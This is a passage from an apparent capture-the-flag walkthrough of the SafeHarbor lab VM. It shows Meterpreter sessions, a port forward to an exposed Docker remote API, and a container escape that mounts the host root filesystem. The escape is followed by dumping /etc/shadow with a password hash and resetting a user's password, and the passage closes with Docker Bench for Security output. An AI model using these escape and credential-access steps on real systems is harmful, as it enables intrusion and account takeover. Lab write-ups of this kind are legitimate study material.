-rw-r--r-- 1 root root 2981 Sep 10  2019 /etc/adduser.conf
-rw-r--r-- 1 root root 191 Sep  7  2014 /etc/libaudit.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 38 May  1 15:39 /etc/resolv.conf
-rw-r--r-- 1 root root 1260 May 26  2014 /etc/ucf.conf
-rw-r--r-- 1 root root 6822 Oct  6  2019 /etc/ca-certificates.conf


[-] Current user's history files:
-rw------- 1 root root 124 Oct  6  2019 /root/.bash_history


[+] Root's history files are accessible!
-rw------- 1 root root 124 Oct  6  2019 /root/.bash_history


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Sep 10  2019 .
drwxr-xr-x 1 root root 4096 Sep 10  2019 ..


[+] Looks like we're in a Docker container:
12:memory:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
11:devices:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
10:freezer:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
9:perf_event:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
8:cpuset:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
7:pids:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
6:hugetlb:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
5:blkio:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
4:cpu,cpuacct:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
3:net_cls,net_prio:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
1:name=systemd:/docker/782f6cae2a82770972d3fecd2ed17b1bc06e0259a249ace6371897a1b8388722
-rwxr-xr-x 1 root root 0 Oct  6  2019 /.dockerenv


### SCAN COMPLETE ####################################

--------------------


cd /root          
 
ls -al
total 20
drwx------ 1 root root 4096 Oct  6  2019 .
drwxr-xr-x 1 root root 4096 May  1 20:24 ..
-rw------- 1 root root  124 Oct  6  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile

cat .bash_history
	ls
	ifconfig
	ip addr
	curl 172.20.0.1:2375
	exit
	curl 172.20.0.1:2375
	exit
	curl 172.20.0.1:2375
	exit
	curl 172.20.0.1:2375
	exit

-----------------------


=======================================================================================================
Step 3. Privilege escalation to become Root on the host (Linux server Shafeharbour)
=======================================================================================================

1. Create a local port forward rule with the metererper shell to be able to access easily the the Docker Remote API
    	

jeff@kali:~/Documents/CTFs/Docker/docker_deb$ sudo dpkg -i docker-ce-cli_5%3a19.03.8~3-0~debian-buster_amd64.deb
Selecting previously unselected package docker-ce-cli.
(Reading database ... 281463 files and directories currently installed.)
Preparing to unpack docker-ce-cli_5%3a19.03.8~3-0~debian-buster_amd64.deb ...
Unpacking docker-ce-cli (5:19.03.8~3-0~debian-buster) ...
Setting up docker-ce-cli (5:19.03.8~3-0~debian-buster) ...
Processing triggers for kali-menu (2020.1.8) ...
Processing triggers for man-db (2.9.1-1) ...
j
eff@kali:~/Documents/CTFs/Docker/docker_deb$ docker

Usage:  docker [OPTIONS] COMMAND
<SNIP>

-----------------------

msf5 post(multi/recon/local_exploit_suggester) > sessions -i

Active sessions
===============
  Id  Name  Type                    Information                                                             Connection
  --  ----  ----                    -----------                                                             ----------
  2         meterpreter x86/linux   no-user @ 707af7b0d61f (uid=82, gid=82, euid=82, egid=82) @ 172.20.0.7  192.168.1.22:4242 -> 192.168.1.35:32886 (172.20.0.7)
  3         meterpreter java/linux  root @ 782f6cae2a82                                                     192.168.1.22:4444 -> 192.168.1.35:52944 (172.20.0.124)



msf5 post(multi/recon/local_exploit_suggester) > jobs -l

Jobs
====
  Id  Name                      Payload  Payload opts
  --  ----                      -------  ------------
  2   Auxiliary: server/socks5           

msf5 post(multi/recon/local_exploit_suggester) > jobs -K 2
Stopping all jobs...
[*] Stopping the socks5 proxy server

msf5 post(multi/recon/local_exploit_suggester) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > run autoroute -s 172.20.0.0 -n 255.255.0.0
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.20.0.0/255.255.0.0...
[-] Could not add route
[*] Use the -p option to list all active routes

meterpreter > portfwd add -l 2375 -p 2375 -r 172.20.0.1
[*] Local TCP relay created: :2375 <-> 172.20.0.1:2375

-------------------------------------------------------------------------

2. Perform a privilege escalation attack using the docker client and the exposed docker socket (i.e. run a new container with a volume pointing to the root folder of the hosting Linux server)
=> Gain root access to the underlying Linux server 'safeharbor' and to the all docker containers


jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1 info

Client:
 Debug Mode: false

Server:
 Containers: 9
  Running: 9
  Paused: 0
  Stopped: 0
 Images: 38
 Server Version: 18.09.7
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Native Overlay Diff: true
 Logging Driver: json-file
 Cgroup Driver: cgroupfs
 Plugins:
  Volume: local
  Network: bridge host macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 
 runc version: N/A
 init version: v0.18.0 (expected: fec3683b971d9c3ef73f284f176672c44b448662)
 Security Options:
  apparmor
  seccomp
   Profile: default
 Kernel Version: 4.15.0-99-generic
 Operating System: Ubuntu 18.04.3 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 1
 Total Memory: 1.946GiB
 Name: safeharbor
 ID: TRG2:B5EI:NIFR:CCJR:YVOT:NNCL:KTMJ:HSFZ:DWYW:HRAE:WMQM:7NQC
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Registry: https://index.docker.io/v1/
 Labels:
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false

WARNING: API is accessible on http://0.0.0.0:2375 without encryption.
         Access to the remote API is equivalent to root access on the host. Refer
         to the 'Docker daemon attack surface' section in the documentation for
         more information: https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface
WARNING: No swap limit support

jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1 ps
CONTAINER ID        IMAGE                      COMMAND                  CREATED             STATUS              PORTS                                            NAMES
9b4ff6556afc        harborbank_kibana          "nginx -g 'daemon of…"   6 months ago        Up 7 hours          80/tcp                                           harborbank_kibana_1
b4c0d2425a60        harborbank_logstash        "/usr/local/bin/dock…"   6 months ago        Up 7 hours          5044/tcp, 9600/tcp, 127.0.0.1:12201->12201/udp   harborbank_logstash_1
fc8a23e22eda        harborbank_nginx           "nginx -g 'daemon of…"   6 months ago        Up 7 hours          0.0.0.0:80->80/tcp                               harborbank_nginx_1
3b769e48d9b9        harborbank_apache_v2       "httpd-foreground"       6 months ago        Up 7 hours          80/tcp                                           harborbank_apache_v2_2
807bb2598bdb        harborbank_apache_v2       "httpd-foreground"       6 months ago        Up 7 hours          80/tcp                                           harborbank_apache_v2_1
e23673b13771        harborbank_apache          "httpd-foreground"       6 months ago        Up 7 hours          80/tcp                                           harborbank_apache_1
782f6cae2a82        harborbank_elasticsearch   "/main.sh default"       6 months ago        Up 7 hours          9200/tcp                                         harborbank_elasticsearch_1
a156b802df29        harborbank_mysql           "docker-entrypoint.s…"   6 months ago        Up 7 hours          3306/tcp                                         harborbank_mysql_1
707af7b0d61f        harborbank_php             "docker-php-entrypoi…"   6 months ago        Up 7 hours          9000/tcp                                         harborbank_php_1

jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1 image ls
REPOSITORY                 TAG                   IMAGE ID            CREATED             SIZE
harborbank_kibana          latest                c775e28f99ce        6 months ago        10.1MB
harborbank_apache_v2       latest                6a9f39e7c760        6 months ago        146MB
harborbank_logstash        latest                abace3284e97        6 months ago        847MB
harborbank_nginx           latest                e167dfc9026c        6 months ago        126MB
harborbank_apache          latest                67afdcbdafd7        6 months ago        146MB
harborbank_php             latest                c8faa39ab13c        6 months ago        86.3MB
harborbank_mysql           latest                8df00a848888        6 months ago        256MB
harborbank_elasticsearch   latest                9178720e85fb        6 months ago        404MB
nginx                      latest                f949e7d76d63        7 months ago        126MB
debian                     jessie                c9d6adb06e4d        7 months ago        129MB
logstash                   7.1.1                 b0cb1543380d        11 months ago       847MB
alpine                     3.2                   98f5f2d17bd1        15 months ago       5.27MB
mysql                      5.6.40                50328380b2b4        21 months ago       256MB
php                        7.2.7-fpm-alpine3.7   9cf17fea14c0        22 months ago       78.3MB
httpd                      2.4.33-alpine         73a557ff177a        22 months ago       91.3MB

jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1 network ls
NETWORK ID          NAME                 DRIVER              SCOPE
460a031735e4        bridge               bridge              local
b8fe54f77458        harborbank_backend   bridge              local
3096b594970a        host                 host                local
adde36ee80c0        none                 null                local
jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1:2375 exec -it 9b4ff6556afc id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1:2375 exec -it b4c0d2425a60 id
uid=1000(logstash) gid=1000(logstash) groups=1000(logstash)
jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1:2375 exec -it fc8a23e22eda id
uid=0(root) gid=0(root) groups=0(root)
jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1:2375 exec -it 3b769e48d9b9 id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1:2375 exec -it 707af7b0d61f id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
jeff@kali:~/Documents/CTFs/SafeHarbor$ docker -H tcp://127.0.0.1:2375 run --rm -it -v /:/host alpine chroot /host bash
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
cbdbe7a5bc2a: Pull complete 
Digest: sha256:9a839e63dad54c3a6d1834e29692c8492d93f90c59c978c1ed79109ea4fb9a54
Status: Downloaded newer image for alpine:latest
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@110379cc43b7:/# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
root@110379cc43b7:/# cat /etc/shadow
root:*:18113:0:99999:7:::
daemon:*:18113:0:99999:7:::
bin:*:18113:0:99999:7:::
sys:*:18113:0:99999:7:::
sync:*:18113:0:99999:7:::
games:*:18113:0:99999:7:::
man:*:18113:0:99999:7:::
lp:*:18113:0:99999:7:::
mail:*:18113:0:99999:7:::
news:*:18113:0:99999:7:::
uucp:*:18113:0:99999:7:::
proxy:*:18113:0:99999:7:::
www-data:*:18113:0:99999:7:::
backup:*:18113:0:99999:7:::
list:*:18113:0:99999:7:::
irc:*:18113:0:99999:7:::
gnats:*:18113:0:99999:7:::
nobody:*:18113:0:99999:7:::
systemd-network:*:18113:0:99999:7:::
systemd-resolve:*:18113:0:99999:7:::
syslog:*:18113:0:99999:7:::
messagebus:*:18113:0:99999:7:::
_apt:*:18113:0:99999:7:::
lxd:*:18113:0:99999:7:::
uuidd:*:18113:0:99999:7:::
dnsmasq:*:18113:0:99999:7:::
landscape:*:18113:0:99999:7:::
pollinate:*:18113:0:99999:7:::
sshd:*:18174:0:99999:7:::
absozed:$6$TgQqU1.iDwFS8cx3$Ve5xiIAy2OSpAnXazMIPKP6DrbCPWgpg3ObLvhBhTi.Bgj7evbbQsB.gBlqLy711vs/Byb.WusRTSL1Fy8guc.:18174:0:99999:7:::

root@110379cc43b7:/# hostname
110379cc43b7

root@110379cc43b7:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
25: eth0@if26: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

root@110379cc43b7:/# useradd jeff

^C
root@110379cc43b7:/# ls
bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swap.img  usr  vmlinuz.old
root@110379cc43b7:/# cd home
root@110379cc43b7:/home# ls
absozed
root@110379cc43b7:/home# cd absozed/
root@110379cc43b7:/home/absozed# ls
HarborBank  out
root@110379cc43b7:/home/absozed# ls -al
total 44
drwxr-xr-x  6 absozed absozed 4096 Oct  6  2019 .
drwxr-xr-x  3 root    root    4096 Oct  5  2019 ..
-rw-------  1 absozed absozed    0 Oct  6  2019 .bash_history
-rw-r--r--  1 absozed absozed  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 absozed absozed 3771 Apr  4  2018 .bashrc
drwx------  3 absozed absozed 4096 Oct  6  2019 .cache
drwx------  3 absozed absozed 4096 Oct  5  2019 .gnupg
drwx------  4 absozed absozed 4096 Oct  6  2019 .local
-rw-r--r--  1 absozed absozed  807 Apr  4  2018 .profile
-rw-r--r--  1 absozed absozed    0 Oct  6  2019 .sudo_as_admin_successful
drwxr-xr-x 12 absozed absozed 4096 Oct  6  2019 HarborBank
-rw-rw-r--  1 absozed absozed 5353 Oct  6  2019 out

root@110379cc43b7:/home/absozed# 

root@110379cc43b7:/home# cd /root                                                                                                                                                                        
root@110379cc43b7:~# ls                                                                                                                                                                                  
Bonus_Flag_2.txt  Flag.txt                                                                                                                                                                               
root@110379cc43b7:~# cat Flag.txt                                                                                                                                                                        
           _-_                                                                                                                                                                                           
          |(_)|                                                                                                                                                                                          
           |||                                                                                                                                                                                           
           |||                                                                                                                                                                                           
           |||
           |||
           |||
     ^     |^|     ^
   < ^ >   <+>   < ^ >
    | |    |||    | |
     \ \__/ | \__/ /
       \,__.|.__,/
           (_)

   .---.  .--.  ,---.,---.  .-. .-.  .--.  ,---.    ,---.    .---.  ,---.    
  ( .-._)/ /\ \ | .-'| .-'  | | | | / /\ \ | .-.\   | .-.\  / .-. ) | .-.\   
 (_) \  / /__\ \| `-.| `-.  | `-' |/ /__\ \| `-'/   | |-' \ | | |(_)| `-'/   
 _  \ \ |  __  || .-'| .-'  | .-. ||  __  ||   (    | |--. \| | | | |   (    
( `-'  )| |  |)|| |  |  `--.| | |)|| |  |)|| |\ \   | |`-' /\ `-' / | |\ \   
 `----' |_|  (_))\|  /( __.'/(  (_)|_|  (_)|_| \)\  /( `--'  )---'  |_| \)\  
               (__) (__)   (__)                (__)(__)     (_)         (__) 
                           
                                           

Congratulations! You've finished SafeHarbor! This is flag 1 of 3. 
Bonus flags will appear based on actions taken during the course of the VM.
(You got this one for a vanilla finish - no special actions taken.)

Proof: 8bd9affc2d9905e9e2dbd8e209bf53c0

Author: AbsoZed (Dylan Barker)
https://caffeinatednegineers.com                                                                                root@110379cc43b7:~# 
root@110379cc43b7:~# 
root@110379cc43b7:~# cat Bonus_Flag_2.txt
         . . .                         
              \|/                          
            `--+--'                        
              /|\                          
             ' | '                         
               |                           
               |                           
           ,--'#`--.                       
           |#######|                       
        _.-'#######`-._                    
     ,-'###############`-.                 
   ,'#####################`,               
  /#########################\              
 |###########################|             
|#############################|            
|#############################|            
|#############################|            
|#############################|            
 |###########################|             
  \#########################/              
   `.#####################,'               
     `._###############_,'                 
        `--..#####..--'

   ▄████████    ▄████████    ▄████████    ▄████████    ▄█    █▄       ▄████████    ▄████████ ▀█████████▄   ▄██████▄     ▄████████ 
  ███    ███   ███    ███   ███    ███   ███    ███   ███    ███     ███    ███   ███    ███   ███    ███ ███    ███   ███    ███ 
  ███    █▀    ███    ███   ███    █▀    ███    █▀    ███    ███     ███    ███   ███    ███   ███    ███ ███    ███   ███    ███ 
  ███          ███    ███  ▄███▄▄▄      ▄███▄▄▄      ▄███▄▄▄▄███▄▄   ███    ███  ▄███▄▄▄▄██▀  ▄███▄▄▄██▀  ███    ███  ▄███▄▄▄▄██▀ 
▀███████████ ▀███████████ ▀▀███▀▀▀     ▀▀███▀▀▀     ▀▀███▀▀▀▀███▀  ▀███████████ ▀▀███▀▀▀▀▀   ▀▀███▀▀▀██▄  ███    ███ ▀▀███▀▀▀▀▀   
         ███   ███    ███   ███          ███    █▄    ███    ███     ███    ███ ▀███████████   ███    ██▄ ███    ███ ▀███████████ 
   ▄█    ███   ███    ███   ███          ███    ███   ███    ███     ███    ███   ███    ███   ███    ███ ███    ███   ███    ███ 
 ▄████████▀    ███    █▀    ███          ██████████   ███    █▀      ███    █▀    ███    ███ ▄█████████▀   ▀██████▀    ███    ███ 
                                                                                  ███    ███                           ███    ███ 


Congratulations! You've finished SafeHarbor! This is flag 3 of 3. 
Bonus flags will appear based on actions taken during the course of the VM.
(You got this one because you blew up the docker environment. Way to go.)

Proof: 5d3f6060e6d2d9cfccbcc053ed58e971

Author: AbsoZed (Dylan Barker)
https://caffeinatednegineers.com                                                                                

root@110379cc43b7:~# 

root@110379cc43b7:~# ls -al
total 40
drwx------  5 root root 4096 Oct  6  2019 .
drwxr-xr-x 24 root root 4096 Apr 30 14:44 ..
-rw-------  1 root root    0 Oct  6  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  3 root root 4096 Oct  6  2019 .cache
drwxr-xr-x  3 root root 4096 Oct  5  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Oct  6  2019 .selected_editor
drwx------  2 root root 4096 Oct  5  2019 .ssh
-rw-r--r--  1 root root 3736 May  1 15:06 Bonus_Flag_2.txt
-rw-r--r--  1 root root 1408 Oct  6  2019 Flag.txt
root@110379cc43b7:~# 


---------------------------------------------------------------------------------------------------

3. Change the password of the user 'absozed' to be able to easily log into the Linux server 'safeharbor' and run the tool 'Docker Bench for Security' that checks 
for dozens of common best-practices around deploying Docker containers in production (https://github.com/docker/docker-bench-security)
=> the docker configuration has not been hardened ;-)


root@110379cc43b7:/tmp# passwd absozed
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully

----------------------------------------------------

jeff@kali:~$ ssh absozed@192.168.1.35
absozed@192.168.1.35's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-99-generic x86_64)

<SNIP>
 * Documentation: 
70 packages can be updated.
0 updates are security updates.

Last login: Sun Oct  6 02:35:44 2019

absozed@safeharbor:~$ sudo su
[sudo] password for absozed: 

root@safeharbor:/home/absozed# 

root@safeharbor:/tmp# wget https://github.com/docker/docker-bench-security/archive/master.zip

--2020-05-01 22:52:37--  https://github.com/docker/docker-bench-security/archive/master.zip
Resolving github.com (github.com)... 140.82.118.4
Connecting to github.com (github.com)|140.82.118.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/docker/docker-bench-security/zip/master [following]
--2020-05-01 22:52:37--  https://codeload.github.com/docker/docker-bench-security/zip/master
Resolving codeload.github.com (codeload.github.com)... 140.82.112.10
Connecting to codeload.github.com (codeload.github.com)|140.82.112.10|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘master.zip’

master.zip                                             [  <=>                                                                                                         ] 281.95K   751KB/s    in 0.4s    

2020-05-01 22:52:38 (751 KB/s) - ‘master.zip’ saved [288713]

root@safeharbor:/tmp# unzip master.zip 
Archive:  master.zip

root@safeharbor:/tmp# cd docker-bench-security-master/

root@safeharbor:/tmp/docker-bench-security-master# ./docker-bench-security.sh 

# ------------------------------------------------------------------------------
# Docker Bench for Security v1.3.5
#                                                                                                                                                                                                        
# Docker, Inc. (c) 2015-
#                                                                                                                                                                                                        
# Checks for dozens of common best-practices around deploying Docker containers in production.
# Inspired by the CIS Docker Benchmark v1.2.0.
# ------------------------------------------------------------------------------                                                                                                                         

Initializing Fri May  1 22:53:18 UTC 2020


[INFO] 1 - Host Configuration

[INFO] 1.1 - General Configuration
[NOTE] 1.1.1  - Ensure the container host has been Hardened
[INFO] 1.1.2  - Ensure Docker is up to date
[INFO]        * Using 18.09.7, verify is it up to date as deemed necessary
[INFO]        * Your operating system vendor may provide support and security maintenance for Docker

[INFO] 1.2 - Linux Hosts Specific Configuration
[WARN] 1.2.1 - Ensure a separate partition for containers has been created
[INFO] 1.2.2  - Ensure only trusted users are allowed to control Docker daemon
[INFO]        * docker:x:1002:absozed
[WARN] 1.2.3  - Ensure auditing is configured for the Docker daemon
[WARN] 1.2.4  - Ensure auditing is configured for Docker files and directories - /var/lib/docker
[WARN] 1.2.5  - Ensure auditing is configured for Docker files and directories - /etc/docker
[WARN] 1.2.6  - Ensure auditing is configured for Docker files and directories - docker.service
[WARN] 1.2.7  - Ensure auditing is configured for Docker files and directories - docker.socket
[WARN] 1.2.8  - Ensure auditing is configured for Docker files and directories - /etc/default/docker
[INFO] 1.2.9  - Ensure auditing is configured for Docker files and directories - /etc/sysconfig/docker
[INFO]        * File not found
[INFO] 1.2.10  - Ensure auditing is configured for Docker files and directories - /etc/docker/daemon.json
[INFO]         * File not found
[WARN] 1.2.11  - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd
[WARN] 1.2.12  - Ensure auditing is configured for Docker files and directories - /usr/sbin/runc


[INFO] 2 - Docker daemon configuration
[WARN] 2.1  - Ensure network traffic is restricted between containers on the default bridge
[PASS] 2.2  - Ensure the logging level is set to 'info'
[PASS] 2.3  - Ensure Docker is allowed to make changes to iptables
[PASS] 2.4  - Ensure insecure registries are not used
[PASS] 2.5  - Ensure aufs storage driver is not used
[INFO] 2.6  - Ensure TLS authentication for Docker daemon is configured
[INFO]      * Docker daemon not listening on TCP
[INFO] 2.7  - Ensure the default ulimit is configured appropriately
[INFO]      * Default ulimit doesn't appear to be set
[WARN] 2.8  - Enable user namespace support
[PASS] 2.9  - Ensure the default cgroup usage has been confirmed
[PASS] 2.10  - Ensure base device size is not changed until needed
[WARN] 2.11  - Ensure that authorization for Docker client commands is enabled
[WARN] 2.12  - Ensure centralized and remote logging is configured
[WARN] 2.13  - Ensure live restore is Enabled
[WARN] 2.14  - Ensure Userland Proxy is Disabled
[PASS] 2.15  - Ensure that a daemon-wide custom seccomp profile is applied if appropriate
[PASS] 2.16  - Ensure that experimental features are not implemented in production
[WARN] 2.17  - Ensure containers are restricted from acquiring new privileges


[INFO] 3 - Docker daemon configuration files
[PASS] 3.1  - Ensure that docker.service file ownership is set to root:root
[PASS] 3.2  - Ensure that docker.service file permissions are appropriately set
[PASS] 3.3  - Ensure that docker.socket file ownership is set to root:root
[PASS] 3.4  - Ensure that docker.socket file permissions are set to 644 or more restrictive
[PASS] 3.5  - Ensure that /etc/docker directory ownership is set to root:root
[PASS] 3.6  - Ensure that /etc/docker directory permissions are set to 755 or more restrictive
[INFO] 3.7  - Ensure that registry certificate file ownership is set to root:root
[INFO]      * Directory not found
[INFO] 3.8  - Ensure that registry certificate file permissions are set to 444 or more restrictive
[INFO]      * Directory not found
[INFO] 3.9  - Ensure that TLS CA certificate file ownership is set to root:root
[INFO]      * No TLS CA certificate found
[INFO] 3.10  - Ensure that TLS CA certificate file permissions are set to 444 or more restrictive
[INFO]       * No TLS CA certificate found
[INFO] 3.11  - Ensure that Docker server certificate file ownership is set to root:root
[INFO]       * No TLS Server certificate found
[INFO] 3.12  - Ensure that Docker server certificate file permissions are set to 444 or more restrictive
[INFO]       * No TLS Server certificate found
[INFO] 3.13  - Ensure that Docker server certificate key file ownership is set to root:root
[INFO]       * No TLS Key found
[INFO] 3.14  - Ensure that Docker server certificate key file permissions are set to 400
[INFO]       * No TLS Key found
[PASS] 3.15  - Ensure that Docker socket file ownership is set to root:docker
[PASS] 3.16  - Ensure that Docker socket file permissions are set to 660 or more restrictive
[INFO] 3.17  - Ensure that daemon.json file ownership is set to root:root
[INFO]       * File not found
[INFO] 3.18  - Ensure that daemon.json file permissions are set to 644 or more restrictive
[INFO]       * File not found
[PASS] 3.19  - Ensure that /etc/default/docker file ownership is set to root:root
[INFO] 3.20  - Ensure that the /etc/sysconfig/docker file ownership is set to root:root
[INFO]       * File not found
[INFO] 3.21  - Ensure that /etc/sysconfig/docker file permissions are set to 644 or more restrictive
[INFO]       * File not found
[PASS] 3.22  - Ensure that /etc/default/docker file permissions are set to 644 or more restrictive


[INFO] 4 - Container Images and Build File
[WARN] 4.1  - Ensure a user for the container has been created
[WARN]      * Running as root: harborbank_kibana_1
[WARN]      * Running as root: harborbank_nginx_1
[WARN]      * Running as root: harborbank_apache_v2_2
[WARN]      * Running as root: harborbank_apache_v2_1
[WARN]      * Running as root: harborbank_apache_1
[WARN]      * Running as root: harborbank_elasticsearch_1
[WARN]      * Running as root: harborbank_mysql_1
[WARN]      * Running as root: harborbank_php_1
[NOTE] 4.2  - Ensure that containers use only trusted base images
[NOTE] 4.3  - Ensure that unnecessary packages are not installed in the container
[NOTE] 4.4  - Ensure images are scanned and rebuilt to include security patches
[WARN] 4.5  - Ensure Content trust for Docker is Enabled
[WARN] 4.6  - Ensure that HEALTHCHECK instructions have been added to container images
[WARN]      * No Healthcheck found: [alpine:latest]
[WARN]      * No Healthcheck found: [harborbank_kibana:latest]
[WARN]      * No Healthcheck found: [harborbank_apache_v2:latest]
[WARN]      * No Healthcheck found: [harborbank_logstash:latest]
[WARN]      * No Healthcheck found: [harborbank_nginx:latest]
[WARN]      * No Healthcheck found: [harborbank_apache:latest]
[WARN]      * No Healthcheck found: [harborbank_php:latest]
[WARN]      * No Healthcheck found: [harborbank_mysql:latest]
[WARN]      * No Healthcheck found: [harborbank_elasticsearch:latest]
[WARN]      * No Healthcheck found: [nginx:latest]
[WARN]      * No Healthcheck found: [debian:jessie]
[WARN]      * No Healthcheck found: [logstash:7.1.1]
[WARN]      * No Healthcheck found: [alpine:3.2]
[WARN]      * No Healthcheck found: [mysql:5.6.40]
[WARN]      * No Healthcheck found: [php:7.2.7-fpm-alpine3.7]
[WARN]      * No Healthcheck found: [httpd:2.4.33-alpine]
[INFO] 4.7  - Ensure update instructions are not use alone in the Dockerfile
[INFO]      * Update instruction found: [harborbank_kibana:latest]
[INFO]      * Update instruction found: [harborbank_apache_v2:latest]
[INFO]      * Update instruction found: [harborbank_logstash:latest]
[INFO]      * Update instruction found: [harborbank_apache:latest]
[INFO]      * Update instruction found: [harborbank_php:latest]
[INFO]      * Update instruction found: [harborbank_mysql:latest]
[INFO]      * Update instruction found: [harborbank_elasticsearch:latest]
[INFO]      * Update instruction found: [logstash:7.1.1]
[INFO]      * Update instruction found: [mysql:5.6.40]
[NOTE] 4.8  - Ensure setuid and setgid permissions are removed
[INFO] 4.9  - Ensure that COPY is used instead of ADD in Dockerfiles
[INFO]      * ADD in image history: [harborbank_logstash:latest]
[INFO]      * ADD in image history: [harborbank_mysql:latest]
[INFO]      * ADD in image history: [logstash:7.1.1]
[NOTE] 4.10  - Ensure secrets are not stored in Dockerfiles
[NOTE] 4.11  - Ensure only verified packages are installed


[INFO] 5 - Container Runtime
[PASS] 5.1  - Ensure that, if applicable, an AppArmor Profile is enabled 
[WARN] 5.2  - Ensure that, if applicable, SELinux security options are set
[WARN]      * No SecurityOptions Found: harborbank_kibana_1
[WARN]      * No SecurityOptions Found: harborbank_logstash_1
[WARN]      * No SecurityOptions Found: harborbank_nginx_1
[WARN]      * No SecurityOptions Found: harborbank_apache_v2_2
[WARN]      * No SecurityOptions Found: harborbank_apache_v2_1
[WARN]      * No SecurityOptions Found: harborbank_apache_1
[WARN]      * No SecurityOptions Found: harborbank_elasticsearch_1
[WARN]      * No SecurityOptions Found: harborbank_mysql_1
[WARN]      * No SecurityOptions Found: harborbank_php_1
[PASS] 5.3  - Ensure Linux Kernel Capabilities are restricted within containers
[PASS] 5.4  - Ensure that privileged containers are not used
[PASS] 5.5  - Ensure sensitive host system directories are not mounted on containers
[PASS] 5.6  - Ensure sshd is not run within containers
[WARN] 5.7  - Ensure privileged ports are not mapped within containers
[WARN]      * Privileged Port in use: 80 in harborbank_nginx_1
[NOTE] 5.8  - Ensure that only needed ports are open on the container
[PASS] 5.9  - Ensure the host's network namespace is not shared
[WARN] 5.10  - Ensure that the memory usage for containers is limited
[WARN]      * Container running without memory restrictions: harborbank_kibana_1
[WARN]      * Container running without memory restrictions: harborbank_logstash_1
[WARN]      * Container running without memory restrictions: harborbank_nginx_1
[WARN]      * Container running without memory restrictions: harborbank_apache_v2_2
[WARN]      * Container running without memory restrictions: harborbank_apache_v2_1
[WARN]      * Container running without memory restrictions: harborbank_apache_1
[WARN]      * Container running without memory restrictions: harborbank_elasticsearch_1
[WARN]      * Container running without memory restrictions: harborbank_mysql_1
[WARN]      * Container running without memory restrictions: harborbank_php_1
[WARN] 5.11  - Ensure CPU priority is set appropriately on the container
